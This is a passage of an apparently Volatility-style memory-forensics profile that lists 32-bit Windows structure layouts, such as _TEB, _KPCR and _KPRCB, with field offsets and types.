'XState' : [ 0x3e0, ['_XSTATE_CONFIGURATION']],
} ],
'__unnamed_1041' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['unsigned long']],
} ],
'_ULARGE_INTEGER' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['unsigned long']],
'u' : [ 0x0, ['__unnamed_1041']],
'QuadPart' : [ 0x0, ['unsigned long long']],
} ],
'__unnamed_1045' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
} ],
'_LARGE_INTEGER' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
'u' : [ 0x0, ['__unnamed_1045']],
'QuadPart' : [ 0x0, ['long long']],
} ],
'__unnamed_105e' : [ 0x4, {
'LongFunction' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Persistent' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Private' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_1060' : [ 0x4, {
'Flags' : [ 0x0, ['unsigned long']],
's' : [ 0x0, ['__unnamed_105e']],
} ],
'_TP_CALLBACK_ENVIRON_V3' : [ 0x28, {
'Version' : [ 0x0, ['unsigned long']],
'Pool' : [ 0x4, ['pointer', ['_TP_POOL']]],
'CleanupGroup' : [ 0x8, ['pointer', ['_TP_CLEANUP_GROUP']]],
'CleanupGroupCancelCallback' : [ 0xc, ['pointer', ['void']]],
'RaceDll' : [ 0x10, ['pointer', ['void']]],
'ActivationContext' : [ 0x14, ['pointer', ['_ACTIVATION_CONTEXT']]],
'FinalizationCallback' : [ 0x18, ['pointer', ['void']]],
'u' : [ 0x1c, ['__unnamed_1060']],
'CallbackPriority' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'TP_CALLBACK_PRIORITY_HIGH', 1: 'TP_CALLBACK_PRIORITY_NORMAL', 2: 'TP_CALLBACK_PRIORITY_LOW', 3: 'TP_CALLBACK_PRIORITY_INVALID'})]],
'Size' : [ 0x24, ['unsigned long']],
} ],
'_TP_TASK' : [ 0x20, {
'Callbacks' : [ 0x0, ['pointer', ['_TP_TASK_CALLBACKS']]],
'NumaNode' : [ 0x4, ['unsigned long']],
'IdealProcessor' : [ 0x8, ['unsigned char']],
'PostGuard' : [ 0xc, ['_TP_NBQ_GUARD']],
'NBQNode' : [ 0x1c, ['pointer', ['void']]],
} ],
'_TP_TASK_CALLBACKS' : [ 0x8, {
'ExecuteCallback' : [ 0x0, ['pointer', ['void']]],
'Unposted' : [ 0x4, ['pointer', ['void']]],
} ],
'_TP_DIRECT' : [ 0xc, {
'Callback' : [ 0x0, ['pointer', ['void']]],
'NumaNode' : [ 0x4, ['unsigned long']],
'IdealProcessor' : [ 0x8, ['unsigned char']],
} ],
'_TEB' : [ 0xfe4, {
'NtTib' : [ 0x0, ['_NT_TIB']],
'EnvironmentPointer' : [ 0x1c, ['pointer', ['void']]],
'ClientId' : [ 0x20, ['_CLIENT_ID']],
'ActiveRpcHandle' : [ 0x28, ['pointer', ['void']]],
'ThreadLocalStoragePointer' : [ 0x2c, ['pointer', ['void']]],
'ProcessEnvironmentBlock' : [ 0x30, ['pointer', ['_PEB']]],
'LastErrorValue' : [ 0x34, ['unsigned long']],
'CountOfOwnedCriticalSections' : [ 0x38, ['unsigned long']],
'CsrClientThread' : [ 0x3c, ['pointer', ['void']]],
'Win32ThreadInfo' : [ 0x40, ['pointer', ['void']]],
'User32Reserved' : [ 0x44, ['array', 26, ['unsigned long']]],
'UserReserved' : [ 0xac, ['array', 5, ['unsigned long']]],
'WOW32Reserved' : [ 0xc0, ['pointer', ['void']]],
'CurrentLocale' : [ 0xc4, ['unsigned long']],
'FpSoftwareStatusRegister' : [ 0xc8, ['unsigned long']],
'SystemReserved1' : [ 0xcc, ['array', 54, ['pointer', ['void']]]],
'ExceptionCode' : [ 0x1a4, ['long']],
'ActivationContextStackPointer' : [ 0x1a8, ['pointer', ['_ACTIVATION_CONTEXT_STACK']]],
'SpareBytes' : [ 0x1ac, ['array', 36, ['unsigned char']]],
'TxFsContext' : [ 0x1d0, ['unsigned long']],
'GdiTebBatch' : [ 0x1d4, ['_GDI_TEB_BATCH']],
'RealClientId' : [ 0x6b4, ['_CLIENT_ID']],
'GdiCachedProcessHandle' : [ 0x6bc, ['pointer', ['void']]],
'GdiClientPID' : [ 0x6c0, ['unsigned long']],
'GdiClientTID' : [ 0x6c4, ['unsigned long']],
'GdiThreadLocalInfo' : [ 0x6c8, ['pointer', ['void']]],
'Win32ClientInfo' : [ 0x6cc, ['array', 62, ['unsigned long']]],
'glDispatchTable' : [ 0x7c4, ['array', 233, ['pointer', ['void']]]],
'glReserved1' : [ 0xb68, ['array', 29, ['unsigned long']]],
'glReserved2' : [ 0xbdc, ['pointer', ['void']]],
'glSectionInfo' : [ 0xbe0, ['pointer', ['void']]],
'glSection' : [ 0xbe4, ['pointer', ['void']]],
'glTable' : [ 0xbe8, ['pointer', ['void']]],
'glCurrentRC' : [ 0xbec, ['pointer', ['void']]],
'glContext' : [ 0xbf0, ['pointer', ['void']]],
'LastStatusValue' : [ 0xbf4, ['unsigned long']],
'StaticUnicodeString' : [ 0xbf8, ['_UNICODE_STRING']],
'StaticUnicodeBuffer' : [ 0xc00, ['array', 261, ['wchar']]],
'DeallocationStack' : [ 0xe0c, ['pointer', ['void']]],
'TlsSlots' : [ 0xe10, ['array', 64, ['pointer', ['void']]]],
'TlsLinks' : [ 0xf10, ['_LIST_ENTRY']],
'Vdm' : [ 0xf18, ['pointer', ['void']]],
'ReservedForNtRpc' : [ 0xf1c, ['pointer', ['void']]],
'DbgSsReserved' : [ 0xf20, ['array', 2, ['pointer', ['void']]]],
'HardErrorMode' : [ 0xf28, ['unsigned long']],
'Instrumentation' : [ 0xf2c, ['array', 9, ['pointer', ['void']]]],
'ActivityId' : [ 0xf50, ['_GUID']],
'SubProcessTag' : [ 0xf60, ['pointer', ['void']]],
'EtwLocalData' : [ 0xf64, ['pointer', ['void']]],
'EtwTraceData' : [ 0xf68, ['pointer', ['void']]],
'WinSockData' : [ 0xf6c, ['pointer', ['void']]],
'GdiBatchCount' : [ 0xf70, ['unsigned long']],
'CurrentIdealProcessor' : [ 0xf74, ['_PROCESSOR_NUMBER']],
'IdealProcessorValue' : [ 0xf74, ['unsigned long']],
'ReservedPad0' : [ 0xf74, ['unsigned char']],
'ReservedPad1' : [ 0xf75, ['unsigned char']],
'ReservedPad2' : [ 0xf76, ['unsigned char']],
'IdealProcessor' : [ 0xf77, ['unsigned char']],
'GuaranteedStackBytes' : [ 0xf78, ['unsigned long']],
'ReservedForPerf' : [ 0xf7c, ['pointer', ['void']]],
'ReservedForOle' : [ 0xf80, ['pointer', ['void']]],
'WaitingOnLoaderLock' : [ 0xf84, ['unsigned long']],
'SavedPriorityState' : [ 0xf88, ['pointer', ['void']]],
'SoftPatchPtr1' : [ 0xf8c, ['unsigned long']],
'ThreadPoolData' : [ 0xf90, ['pointer', ['void']]],
'TlsExpansionSlots' : [ 0xf94, ['pointer', ['pointer', ['void']]]],
'MuiGeneration' : [ 0xf98, ['unsigned long']],
'IsImpersonating' : [ 0xf9c, ['unsigned long']],
'NlsCache' : [ 0xfa0, ['pointer', ['void']]],
'pShimData' : [ 0xfa4, ['pointer', ['void']]],
'HeapVirtualAffinity' : [ 0xfa8, ['unsigned long']],
'CurrentTransactionHandle' : [ 0xfac, ['pointer', ['void']]],
'ActiveFrame' : [ 0xfb0, ['pointer', ['_TEB_ACTIVE_FRAME']]],
'FlsData' : [ 0xfb4, ['pointer', ['void']]],
'PreferredLanguages' : [ 0xfb8, ['pointer', ['void']]],
'UserPrefLanguages' : [ 0xfbc, ['pointer', ['void']]],
'MergedPrefLanguages' : [ 0xfc0, ['pointer', ['void']]],
'MuiImpersonation' : [ 0xfc4, ['unsigned long']],
'CrossTebFlags' : [ 0xfc8, ['unsigned short']],
'SpareCrossTebBits' : [ 0xfc8, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned short')]],
'SameTebFlags' : [ 0xfca, ['unsigned short']],
'SafeThunkCall' : [ 0xfca, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'InDebugPrint' : [ 0xfca, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'HasFiberData' : [ 0xfca, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned short')]],
'SkipThreadAttach' : [ 0xfca, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned short')]],
'WerInShipAssertCode' : [ 0xfca, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'RanProcessInit' : [ 0xfca, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned short')]],
'ClonedThread' : [ 0xfca, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned short')]],
'SuppressDebugMsg' : [ 0xfca, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned short')]],
'DisableUserStackWalk' : [ 0xfca, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned short')]],
'RtlExceptionAttached' : [ 0xfca, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned short')]],
'InitialThread' : [ 0xfca, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned short')]],
'SpareSameTebBits' : [ 0xfca, ['BitField', dict(start_bit = 11, end_bit = 16, native_type='unsigned short')]],
'TxnScopeEnterCallback' : [ 0xfcc, ['pointer', ['void']]],
'TxnScopeExitCallback' : [ 0xfd0, ['pointer', ['void']]],
'TxnScopeContext' : [ 0xfd4, ['pointer', ['void']]],
'LockCount' : [ 0xfd8, ['unsigned long']],
'SpareUlong0' : [ 0xfdc, ['unsigned long']],
'ResourceRetValue' : [ 0xfe0, ['pointer', ['void']]],
} ],
'_LIST_ENTRY' : [ 0x8, {
'Flink' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'Blink' : [ 0x4, ['pointer', ['_LIST_ENTRY']]],
} ],
'_SINGLE_LIST_ENTRY' : [ 0x4, {
'Next' : [ 0x0, ['pointer', ['_SINGLE_LIST_ENTRY']]],
} ],
'_RTL_DYNAMIC_HASH_TABLE_CONTEXT' : [ 0xc, {
'ChainHead' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'PrevLinkage' : [ 0x4, ['pointer', ['_LIST_ENTRY']]],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'_RTL_DYNAMIC_HASH_TABLE_ENUMERATOR' : [ 0x14, {
'HashEntry' : [ 0x0, ['_RTL_DYNAMIC_HASH_TABLE_ENTRY']],
'ChainHead' : [ 0xc, ['pointer', ['_LIST_ENTRY']]],
'BucketIndex' : [ 0x10, ['unsigned long']],
} ],
'_RTL_DYNAMIC_HASH_TABLE' : [ 0x24, {
'Flags' : [ 0x0, ['unsigned long']],
'Shift' : [ 0x4, ['unsigned long']],
'TableSize' : [ 0x8, ['unsigned long']],
'Pivot' : [ 0xc, ['unsigned long']],
'DivisorMask' : [ 0x10, ['unsigned long']],
'NumEntries' : [ 0x14, ['unsigned long']],
'NonEmptyBuckets' : [ 0x18, ['unsigned long']],
'NumEnumerators' : [ 0x1c, ['unsigned long']],
'Directory' : [ 0x20, ['pointer', ['void']]],
} ],
'_UNICODE_STRING' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['pointer', ['unsigned short']]],
} ],
'_STRING' : [ 0x8, {
'Length' : [ 0x0, ['unsigned short']],
'MaximumLength' : [ 0x2, ['unsigned short']],
'Buffer' : [ 0x4, ['pointer', ['unsigned char']]],
} ],
'_LUID' : [ 0x8, {
'LowPart' : [ 0x0, ['unsigned long']],
'HighPart' : [ 0x4, ['long']],
} ],
'_IMAGE_NT_HEADERS' : [ 0xf8, {
'Signature' : [ 0x0, ['unsigned long']],
'FileHeader' : [ 0x4, ['_IMAGE_FILE_HEADER']],
'OptionalHeader' : [ 0x18, ['_IMAGE_OPTIONAL_HEADER']],
} ],
'_IMAGE_DOS_HEADER' : [ 0x40, {
'e_magic' : [ 0x0, ['unsigned short']],
'e_cblp' : [ 0x2, ['unsigned short']],
'e_cp' : [ 0x4, ['unsigned short']],
'e_crlc' : [ 0x6, ['unsigned short']],
'e_cparhdr' : [ 0x8, ['unsigned short']],
'e_minalloc' : [ 0xa, ['unsigned short']],
'e_maxalloc' : [ 0xc, ['unsigned short']],
'e_ss' : [ 0xe, ['unsigned short']],
'e_sp' : [ 0x10, ['unsigned short']],
'e_csum' : [ 0x12, ['unsigned short']],
'e_ip' : [ 0x14, ['unsigned short']],
'e_cs' : [ 0x16, ['unsigned short']],
'e_lfarlc' : [ 0x18, ['unsigned short']],
'e_ovno' : [ 0x1a, ['unsigned short']],
'e_res' : [ 0x1c, ['array', 4, ['unsigned short']]],
'e_oemid' : [ 0x24, ['unsigned short']],
'e_oeminfo' : [ 0x26, ['unsigned short']],
'e_res2' : [ 0x28, ['array', 10, ['unsigned short']]],
'e_lfanew' : [ 0x3c, ['long']],
} ],
'_KPCR' : [ 0x3748, {
'NtTib' : [ 0x0, ['_NT_TIB']],
'Used_ExceptionList' : [ 0x0, ['pointer', ['_EXCEPTION_REGISTRATION_RECORD']]],
'Used_StackBase' : [ 0x4, ['pointer', ['void']]],
'Spare2' : [ 0x8, ['pointer', ['void']]],
'TssCopy' : [ 0xc, ['pointer', ['void']]],
'ContextSwitches' : [ 0x10, ['unsigned long']],
'SetMemberCopy' : [ 0x14, ['unsigned long']],
'Used_Self' : [ 0x18, ['pointer', ['void']]],
'SelfPcr' : [ 0x1c, ['pointer', ['_KPCR']]],
'Prcb' : [ 0x20, ['pointer', ['_KPRCB']]],
'Irql' : [ 0x24, ['unsigned char']],
'IRR' : [ 0x28, ['unsigned long']],
'IrrActive' : [ 0x2c, ['unsigned long']],
'IDR' : [ 0x30, ['unsigned long']],
'KdVersionBlock' : [ 0x34, ['pointer', ['void']]],
'IDT' : [ 0x38, ['pointer', ['_KIDTENTRY']]],
'GDT' : [ 0x3c, ['pointer', ['_KGDTENTRY']]],
'TSS' : [ 0x40, ['pointer', ['_KTSS']]],
'MajorVersion' : [ 0x44, ['unsigned short']],
'MinorVersion' : [ 0x46, ['unsigned short']],
'SetMember' : [ 0x48, ['unsigned long']],
'StallScaleFactor' : [ 0x4c, ['unsigned long']],
'SpareUnused' : [ 0x50, ['unsigned char']],
'Number' : [ 0x51, ['unsigned char']],
'Spare0' : [ 0x52, ['unsigned char']],
'SecondLevelCacheAssociativity' : [ 0x53, ['unsigned char']],
'VdmAlert' : [ 0x54, ['unsigned long']],
'KernelReserved' : [ 0x58, ['array', 14, ['unsigned long']]],
'SecondLevelCacheSize' : [ 0x90, ['unsigned long']],
'HalReserved' : [ 0x94, ['array', 16, ['unsigned long']]],
'InterruptMode' : [ 0xd4, ['unsigned long']],
'Spare1' : [ 0xd8, ['unsigned char']],
'KernelReserved2' : [ 0xdc, ['array', 17, ['unsigned long']]],
'PrcbData' : [ 0x120, ['_KPRCB']],
} ],
'_KPRCB' : [ 0x3628, {
'MinorVersion' : [ 0x0, ['unsigned short']],
'MajorVersion' : [ 0x2, ['unsigned short']],
'CurrentThread' : [ 0x4, ['pointer', ['_KTHREAD']]],
'NextThread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'IdleThread' : [ 0xc, ['pointer', ['_KTHREAD']]],
'LegacyNumber' : [ 0x10, ['unsigned char']],
'NestingLevel' : [ 0x11, ['unsigned char']],
'BuildType' : [ 0x12, ['unsigned short']],
'CpuType' : [ 0x14, ['unsigned char']],
'CpuID' : [ 0x15, ['unsigned char']],
'CpuStep' : [ 0x16, ['unsigned short']],
'CpuStepping' : [ 0x16, ['unsigned char']],
'CpuModel' : [ 0x17, ['unsigned char']],
'ProcessorState' : [ 0x18, ['_KPROCESSOR_STATE']],
'KernelReserved' : [ 0x338, ['array', 16, ['unsigned long']]],
'HalReserved' : [ 0x378, ['array', 16, ['unsigned long']]],
'CFlushSize' : [ 0x3b8, ['unsigned long']],
'CoresPerPhysicalProcessor' : [ 0x3bc, ['unsigned char']],
'LogicalProcessorsPerCore' : [ 0x3bd, ['unsigned char']],
'PrcbPad0' : [ 0x3be, ['array', 2, ['unsigned char']]],
'MHz' : [ 0x3c0, ['unsigned long']],
'CpuVendor' : [ 0x3c4, ['unsigned char']],
'GroupIndex' : [ 0x3c5, ['unsigned char']],
'Group' : [ 0x3c6, ['unsigned short']],
'GroupSetMember' : [ 0x3c8, ['unsigned long']],
'Number' : [ 0x3cc, ['unsigned long']],
'PrcbPad1' : [ 0x3d0, ['array', 72, ['unsigned char']]],
'LockQueue' : [ 0x418, ['array', 17, ['_KSPIN_LOCK_QUEUE']]],
'NpxThread' : [ 0x4a0, ['pointer', ['_KTHREAD']]],
'InterruptCount' : [ 0x4a4, ['unsigned long']],
'KernelTime' : [ 0x4a8, ['unsigned long']],
'UserTime' : [ 0x4ac, ['unsigned long']],
'DpcTime' : [ 0x4b0, ['unsigned long']],
'DpcTimeCount' : [ 0x4b4, ['unsigned long']],
'InterruptTime' : [ 0x4b8, ['unsigned long']],
'AdjustDpcThreshold' : [ 0x4bc, ['unsigned long']],
'PageColor' : [ 0x4c0, ['unsigned long']],
'DebuggerSavedIRQL' : [ 0x4c4, ['unsigned char']],
'NodeColor' : [ 0x4c5, ['unsigned char']],
'PrcbPad20' : [ 0x4c6, ['array', 2, ['unsigned char']]],
'NodeShiftedColor' : [ 0x4c8, ['unsigned long']],
'ParentNode' : [ 0x4cc, ['pointer', ['_KNODE']]],
'SecondaryColorMask' : [ 0x4d0, ['unsigned long']],
'DpcTimeLimit' : [ 0x4d4, ['unsigned long']],
'PrcbPad21' : [ 0x4d8, ['array', 2, ['unsigned long']]],
'CcFastReadNoWait' : [ 0x4e0, ['unsigned long']],
'CcFastReadWait' : [ 0x4e4, ['unsigned long']],
'CcFastReadNotPossible' : [ 0x4e8, ['unsigned long']],
'CcCopyReadNoWait' : [ 0x4ec, ['unsigned long']],
'CcCopyReadWait' : [ 0x4f0, ['unsigned long']],
'CcCopyReadNoWaitMiss' : [ 0x4f4, ['unsigned long']],
'MmSpinLockOrdering' : [ 0x4f8, ['long']],
'IoReadOperationCount' : [ 0x4fc, ['long']],
'IoWriteOperationCount' : [ 0x500, ['long']],
'IoOtherOperationCount' : [ 0x504, ['long']],
'IoReadTransferCount' : [ 0x508, ['_LARGE_INTEGER']],
'IoWriteTransferCount' : [ 0x510, ['_LARGE_INTEGER']],
'IoOtherTransferCount' : [ 0x518, ['_LARGE_INTEGER']],
'CcFastMdlReadNoWait' : [ 0x520, ['unsigned long']],
'CcFastMdlReadWait' : [ 0x524, ['unsigned long']],
'CcFastMdlReadNotPossible' : [ 0x528, ['unsigned long']],
'CcMapDataNoWait' : [ 0x52c, ['unsigned long']],
'CcMapDataWait' : [ 0x530, ['unsigned long']],
'CcPinMappedDataCount' : [ 0x534, ['unsigned long']],
'CcPinReadNoWait' : [ 0x538, ['unsigned long']],
'CcPinReadWait' : [ 0x53c, ['unsigned long']],
'CcMdlReadNoWait' : [ 0x540, ['unsigned long']],
'CcMdlReadWait' : [ 0x544, ['unsigned long']],
'CcLazyWriteHotSpots' : [ 0x548, ['unsigned long']],
'CcLazyWriteIos' : [ 0x54c, ['unsigned long']],
'CcLazyWritePages' : [ 0x550, ['unsigned long']],
'CcDataFlushes' : [ 0x554, ['unsigned long']],
'CcDataPages' : [ 0x558, ['unsigned long']],
'CcLostDelayedWrites' : [ 0x55c, ['unsigned long']],
'CcFastReadResourceMiss' : [ 0x560, ['unsigned long']],
'CcCopyReadWaitMiss' : [ 0x564, ['unsigned long']],
'CcFastMdlReadResourceMiss' : [ 0x568, ['unsigned long']],
'CcMapDataNoWaitMiss' : [ 0x56c, ['unsigned long']],
'CcMapDataWaitMiss' : [ 0x570, ['unsigned long']],
'CcPinReadNoWaitMiss' : [ 0x574, ['unsigned long']],
'CcPinReadWaitMiss' : [ 0x578, ['unsigned long']],
'CcMdlReadNoWaitMiss' : [ 0x57c, ['unsigned long']],
'CcMdlReadWaitMiss' : [ 0x580, ['unsigned long']],
'CcReadAheadIos' : [ 0x584, ['unsigned long']],
'KeAlignmentFixupCount' : [ 0x588, ['unsigned long']],
'KeExceptionDispatchCount' : [ 0x58c, ['unsigned long']],
'KeSystemCalls' : [ 0x590, ['unsigned long']],
'AvailableTime' : [ 0x594, ['unsigned long']],
'PrcbPad22' : [ 0x598, ['array', 2, ['unsigned long']]],
'PPLookasideList' : [ 0x5a0, ['array', 16, ['_PP_LOOKASIDE_LIST']]],
'PPNPagedLookasideList' : [ 0x620, ['array', 32, ['_GENERAL_LOOKASIDE_POOL']]],
'PPPagedLookasideList' : [ 0xf20, ['array', 32, ['_GENERAL_LOOKASIDE_POOL']]],
'PacketBarrier' : [ 0x1820, ['unsigned long']],
'ReverseStall' : [ 0x1824, ['long']],
'IpiFrame' : [ 0x1828, ['pointer', ['void']]],
'PrcbPad3' : [ 0x182c, ['array', 52, ['unsigned char']]],
'CurrentPacket' : [ 0x1860, ['array', 3, ['pointer', ['void']]]],
'TargetSet' : [ 0x186c, ['unsigned long']],
'WorkerRoutine' : [ 0x1870, ['pointer', ['void']]],
'IpiFrozen' : [ 0x1874, ['unsigned long']],
'PrcbPad4' : [ 0x1878, ['array', 40, ['unsigned char']]],
'RequestSummary' : [ 0x18a0, ['unsigned long']],
'SignalDone' : [ 0x18a4, ['pointer', ['_KPRCB']]],
'PrcbPad50' : [ 0x18a8, ['array', 56, ['unsigned char']]],
'DpcData' : [ 0x18e0, ['array', 2, ['_KDPC_DATA']]],
'DpcStack' : [ 0x1908, ['pointer', ['void']]],
'MaximumDpcQueueDepth' : [ 0x190c, ['long']],
'DpcRequestRate' : [ 0x1910, ['unsigned long']],
'MinimumDpcRate' : [ 0x1914, ['unsigned long']],
'DpcLastCount' : [ 0x1918, ['unsigned long']],
'PrcbLock' : [ 0x191c, ['unsigned long']],
'DpcGate' : [ 0x1920, ['_KGATE']],
'ThreadDpcEnable' : [ 0x1930, ['unsigned char']],
'QuantumEnd' : [ 0x1931, ['unsigned char']],
'DpcRoutineActive' : [ 0x1932, ['unsigned char']],
'IdleSchedule' : [ 0x1933, ['unsigned char']],
'DpcRequestSummary' : [ 0x1934, ['long']],
'DpcRequestSlot' : [ 0x1934, ['array', 2, ['short']]],
'NormalDpcState' : [ 0x1934, ['short']],
'DpcThreadActive' : [ 0x1936, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'ThreadDpcState' : [ 0x1936, ['short']],
'TimerHand' : [ 0x1938, ['unsigned long']],
'LastTick' : [ 0x193c, ['unsigned long']],
'MasterOffset' : [ 0x1940, ['long']],
'PrcbPad41' : [ 0x1944, ['array', 2, ['unsigned long']]],
'PeriodicCount' : [ 0x194c, ['unsigned long']],
'PeriodicBias' : [ 0x1950, ['unsigned long']],
'TickOffset' : [ 0x1958, ['unsigned long long']],
'TimerTable' : [ 0x1960, ['_KTIMER_TABLE']],
'CallDpc' : [ 0x31a0, ['_KDPC']],
'ClockKeepAlive' : [ 0x31c0, ['long']],
'ClockCheckSlot' : [ 0x31c4, ['unsigned char']],
'ClockPollCycle' : [ 0x31c5, ['unsigned char']],
'PrcbPad6' : [ 0x31c6, ['array', 2, ['unsigned char']]],
'DpcWatchdogPeriod' : [ 0x31c8, ['long']],
'DpcWatchdogCount' : [ 0x31cc, ['long']],
'ThreadWatchdogPeriod' : [ 0x31d0, ['long']],
'ThreadWatchdogCount' : [ 0x31d4, ['long']],
'KeSpinLockOrdering' : [ 0x31d8, ['long']],
'PrcbPad70' : [ 0x31dc, ['array', 1, ['unsigned long']]],
'WaitListHead' : [ 0x31e0, ['_LIST_ENTRY']],
'WaitLock' : [ 0x31e8, ['unsigned long']],
'ReadySummary' : [ 0x31ec, ['unsigned long']],
'QueueIndex' : [ 0x31f0, ['unsigned long']],
'DeferredReadyListHead' : [ 0x31f4, ['_SINGLE_LIST_ENTRY']],
'StartCycles' : [ 0x31f8, ['unsigned long long']],
'CycleTime' : [ 0x3200, ['unsigned long long']],
'HighCycleTime' : [ 0x3208, ['unsigned long']],
'PrcbPad71' : [ 0x320c, ['unsigned long']],
'PrcbPad72' : [ 0x3210, ['array', 2, ['unsigned long long']]],
'DispatcherReadyListHead' : [ 0x3220, ['array', 32, ['_LIST_ENTRY']]],
'ChainedInterruptList' : [ 0x3320, ['pointer', ['void']]],
'LookasideIrpFloat' : [ 0x3324, ['long']],
'MmPageFaultCount' : [ 0x3328, ['long']],
'MmCopyOnWriteCount' : [ 0x332c, ['long']],
'MmTransitionCount' : [ 0x3330, ['long']],
'MmCacheTransitionCount' : [ 0x3334, ['long']],
'MmDemandZeroCount' : [ 0x3338, ['long']],
'MmPageReadCount' : [ 0x333c, ['long']],
'MmPageReadIoCount' : [ 0x3340, ['long']],
'MmCacheReadCount' : [ 0x3344, ['long']],
'MmCacheIoCount' : [ 0x3348, ['long']],
'MmDirtyPagesWriteCount' : [ 0x334c, ['long']],
'MmDirtyWriteIoCount' : [ 0x3350, ['long']],
'MmMappedPagesWriteCount' : [ 0x3354, ['long']],
'MmMappedWriteIoCount' : [ 0x3358, ['long']],
'CachedCommit' : [ 0x335c, ['unsigned long']],
'CachedResidentAvailable' : [ 0x3360, ['unsigned long']],
'HyperPte' : [ 0x3364, ['pointer', ['void']]],
'PrcbPad8' : [ 0x3368, ['array', 4, ['unsigned char']]],
'VendorString' : [ 0x336c, ['array', 13, ['unsigned char']]],
'InitialApicId' : [ 0x3379, ['unsigned char']],
'LogicalProcessorsPerPhysicalProcessor' : [ 0x337a, ['unsigned char']],
'PrcbPad9' : [ 0x337b, ['array', 5, ['unsigned char']]],
'FeatureBits' : [ 0x3380, ['unsigned long']],
'UpdateSignature' : [ 0x3388, ['_LARGE_INTEGER']],
'IsrTime' : [ 0x3390, ['unsigned long long']],
'RuntimeAccumulation' : [ 0x3398, ['unsigned long long']],
'PowerState' : [ 0x33a0, ['_PROCESSOR_POWER_STATE']],
'DpcWatchdogDpc' : [ 0x3468, ['_KDPC']],
'DpcWatchdogTimer' : [ 0x3488, ['_KTIMER']],
'WheaInfo' : [ 0x34b0, ['pointer', ['void']]],
'EtwSupport' : [ 0x34b4, ['pointer', ['void']]],
'InterruptObjectPool' : [ 0x34b8, ['_SLIST_HEADER']],
'HypercallPageList' : [ 0x34c0, ['_SLIST_HEADER']],
'HypercallPageVirtual' : [ 0x34c8, ['pointer', ['void']]],
'VirtualApicAssist' : [ 0x34cc, ['pointer', ['void']]],
'StatisticsPage' : [ 0x34d0, ['pointer', ['unsigned long long']]],
'RateControl' : [ 0x34d4, ['pointer', ['void']]],
'Cache' : [ 0x34d8, ['array', 5, ['_CACHE_DESCRIPTOR']]],
'CacheCount' : [ 0x3514, ['unsigned long']],
'CacheProcessorMask' : [ 0x3518, ['array', 5, ['unsigned long']]],
'PackageProcessorSet' : [ 0x352c, ['_KAFFINITY_EX']],
'PrcbPad91' : [ 0x3538, ['array', 1, ['unsigned long']]],
'CoreProcessorSet' : [ 0x353c, ['unsigned long']],
'TimerExpirationDpc' : [ 0x3540, ['_KDPC']],
'SpinLockAcquireCount' : [ 0x3560, ['unsigned long']],
'SpinLockContentionCount' : [ 0x3564, ['unsigned long']],
'SpinLockSpinCount' : [ 0x3568, ['unsigned long']],
'IpiSendRequestBroadcastCount' : [ 0x356c, ['unsigned long']],
'IpiSendRequestRoutineCount' : [ 0x3570, ['unsigned long']],
'IpiSendSoftwareInterruptCount' : [ 0x3574, ['unsigned long']],
'ExInitializeResourceCount' : [ 0x3578, ['unsigned long']],
'ExReInitializeResourceCount' : [ 0x357c, ['unsigned long']],
'ExDeleteResourceCount' : [ 0x3580, ['unsigned long']],
'ExecutiveResourceAcquiresCount' : [ 0x3584, ['unsigned long']],
'ExecutiveResourceContentionsCount' : [ 0x3588, ['unsigned long']],
'ExecutiveResourceReleaseExclusiveCount' : [ 0x358c, ['unsigned long']],
'ExecutiveResourceReleaseSharedCount' : [ 0x3590, ['unsigned long']],
'ExecutiveResourceConvertsCount' : [ 0x3594, ['unsigned long']],
'ExAcqResExclusiveAttempts' : [ 0x3598, ['unsigned long']],
'ExAcqResExclusiveAcquiresExclusive' : [ 0x359c, ['unsigned long']],
'ExAcqResExclusiveAcquiresExclusiveRecursive' : [ 0x35a0, ['unsigned long']],
'ExAcqResExclusiveWaits' : [ 0x35a4, ['unsigned long']],
'ExAcqResExclusiveNotAcquires' : [ 0x35a8, ['unsigned long']],
'ExAcqResSharedAttempts' : [ 0x35ac, ['unsigned long']],
'ExAcqResSharedAcquiresExclusive' : [ 0x35b0, ['unsigned long']],
'ExAcqResSharedAcquiresShared' : [ 0x35b4, ['unsigned long']],
'ExAcqResSharedAcquiresSharedRecursive' : [ 0x35b8, ['unsigned long']],
'ExAcqResSharedWaits' : [ 0x35bc, ['unsigned long']],
'ExAcqResSharedNotAcquires' : [ 0x35c0, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAttempts' : [ 0x35c4, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresExclusive' : [ 0x35c8, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresShared' : [ 0x35cc, ['unsigned long']],
'ExAcqResSharedStarveExclusiveAcquiresSharedRecursive' : [ 0x35d0, ['unsigned long']],
